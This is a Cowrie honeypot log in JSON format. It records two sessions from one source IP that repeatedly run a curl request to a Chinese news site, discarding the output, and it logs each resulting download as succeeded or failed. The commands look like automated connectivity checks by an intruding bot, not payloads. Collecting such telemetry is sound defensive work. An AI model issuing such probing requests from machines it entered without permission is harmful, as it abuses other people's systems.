{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.491381Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.493632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.494714Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.499229Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.524401Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.526331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.527619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.532341Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.533161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.565404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.566584Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.571187Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.572336Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.577063Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.578405Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.601486Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.602722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.608693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.609872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.619417Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.641594Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.642789Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.651433Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.653308Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.660911Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.672498Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.681389Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.682602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.691035Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.692503Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.700350Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.706534Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.707513Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.709588Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.723294Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.724388Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.731666Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.733169Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.759524Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.764894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.766069Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.772500Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.780794Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.781803Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.787829Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.788833Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.790740Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.798114Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.808238Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.811447Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.819350Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.820487Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.823597Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.834161Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.845586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.846635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.853166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.878491Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.879722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.887608Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.893396Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.896116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.897279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.906567Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:33.914326Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:33.915453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.484344Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.485322Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.486652Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.488701Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.491075Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.492188Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.493682Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.495677Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.496757Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.499155Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.500586Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.502231Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.503160Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.504158Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.507166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.508660Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.510144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.513306Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.516170Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.519297Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.522772Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.525286Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.527789Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.530565Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
